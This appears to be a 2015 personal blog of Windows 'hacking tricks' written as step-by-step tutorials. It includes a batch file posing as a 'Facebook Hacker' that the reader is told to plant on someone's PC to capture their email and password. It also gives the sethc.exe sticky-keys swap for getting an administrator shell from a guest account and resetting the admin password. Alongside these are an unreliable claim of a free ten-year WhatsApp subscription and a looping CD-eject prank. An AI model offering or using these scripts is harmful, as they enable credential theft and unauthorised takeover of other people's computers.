Search This Blog

Thursday, 16 July 2015

How to get whatsapp subscription for 10 years




               
       GET WHATSAPP SUBSCRIPTION FOR 10 YEAR 

All of u know now whatapp is developed one most part of our life. It is community but when we download it or create account it free for 1 years. After this we should pay it some money. But from that trick u will get it for 10 with no extra charge that means free. For that carefully follow below steps Steps:-- 
1. First, Delete yourWhats App Account from your Phone. 

2. Now you will need to look for a Friend or Anyone who has Apple Iphone or Ipad Any Version 

3. Then you need to Register WhatsApp with your Number on his Iphone or Ipad. 

4. Now After entering you Number on Iphone/Ipad, you will get a Verification code on your Mobile, Just Check your inbox, and Enter the Verification code on Iphone/Ipad 

5. After these Steps WhatsApp will load and Start on Iphone, just Check WhatsApp Account and it will have PaidSubscription till2025. 

             Now Final step Delete your Account from the Iphone/Ipad. and Simply downlaod WhatsApp on Any Device which supports it and Enter yourNumber then verify It. you will see you have got 10 Years of WhatsApp Free. I hope that help u to get whatapp for 10.................................


How to chat with cmd or command prompt without re-entering the ip address



           hello everyone, if you want to chat through cmd this trick is for you and the plus point is you don't have to enter the ip address again. In my previous post you have to enter the ip address every time when you message but this time this is gonna be very easy try this.
           just open up the notepad and copy paste the following code---


@echo off echo Messenger echo When typing the computer name, type echo in /server:computer replacing echo computer with the IP adress of the computer. :START set /p c=Enter computer name here: :A set /p m=Enter message here: msg * %c% %m% GoTo A



        and then save as "Messenger.bat" and close the 

Notepad

    when you open the file Messenger it will open the command prompt.

Messenger
User:

after "User" write the ip of the computer you want to contact and then press enter.

  and then you can start the chat with him.

                                Enjoy!

How to chat with cmd or command prompt



             Hi everyone today I will show you how to make chat with cmd .

          First open Notepad and write this

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

      and then save as "Messenger.bat" and close the Notepad

    when you open the file Messenger it will open the command prompt.

Messenger
User:

after "User" write the ip of the computer you want to contact and then press enter.

  and then you can start the chat with him.

Wednesday, 15 July 2015

How to create keylogger using notepad




                          How to create keylogger using notepad


You can create it using Notepad, and the only work u have to do just install that keylogger on him/her
PC and tell them that this is a Facebook Hacker when they type there Email And Password in it and you will get the Password from their PC.
Now start:-

1. Create a folder named "Hacker" in C: drive in your computer (do not use quotes)

2. Copy the following codes and paste it in notepad and save it as BATCH file (extension)is .bat .
 ex: anyname.bat

@echo off
color a
title Facebook Hacking :Login:
cls
echo Please Enter Your Facebook Email Adress And Password
echo To Hack Any Facebook Account
echo.
echo.
cd "C:\Hacker"
set /p user=Email ID:
set /p pass=Password:
echo Username="%user%" Password="%pass%">hACKED.txt
echo.
echo.
echo Press any key to continue
pause >n
echo Loading.....
echo.
echo.
echo Enter E-Mail Id Of Victim
set /p user=Email ID:
echo Username="%user%">Victim.txt
echo.
echo Press any key to hack this ID
echo.
echo.
pause >
echo.
echo Processing...
echo.
echo.
echo.
echo.
echo.
pause >n

3.SAVE it in notepad as .bat file. (at anywhere SAY - Desktop).

4.Now open the that file

5.it will ask for your Facebook Email ID and Password.
Enter Email ID and Password in it.

6. Now it will ask for Victim EMAIL ID
Enter any ID( SAY - 111111@ ds.com).

7. After completing this go to that Folder that you created earlier named Hacker
open this folder.
Automatically you will get the Email IDs and Password in TEXT file.

That's all :)

How to Hack windows administrator account through guest account




          How to Hack windows administrator account through guest account, using some simple steps--

1) Go to C:/windows/system32. 

2) Copy cmd.exe and paste it on desktop. 

3) Rename cmd.exe to sethc.exe. 

4) Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes. 

5) Now Log out from your guest account and at the user select window,press shift key 5 times. 

6) Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open. 

7) Now type “ NET USER ADMINISTRATOR “zzz” where “zzz” can be any password you like and press enter. 

8) You will see “ The Command completed successfully” and then exit the command prompt and login into 
 with your new password. 

9) Bravo !! Now You have hacked admin through guest account.

Trick to make your pc talk!



                    Hello friends, have you ever imagine that if can make your pc talk. Yeah you are right with this amazing trick you can make it happen. What you'll type your computer will speak..


                          To make your pc talk

    Open a text file in notepad and write:

    Dim msg, sapi msg=InputBox("Enter your text","Talk it") Set sapi=CreateObject("sapi.spvoice") 
sapi.Speak msg

    Save the file with a (*.vbs) extension, it will create a VBScript File.

    It will prompt you for a text when u open the file, input the text and press ok." u will hear now what u typed..

popping CD drive




                Hello guys, I have an another trick for you this trick will make your CD drive constantly pop out..


                               Popping CD Drives

    This will make the CD drives constantly pop out

  open the notepad and copy the code given below--

    Set oWMP = CreateObject(”WMPlayer.OCX.7?) Set colCDROMs = oWMP.cdromCollection do 
if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next 
For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 100 loop

   Save the file with a (*.vbs) extension, it will create a VBScript File.
Powered By Blogger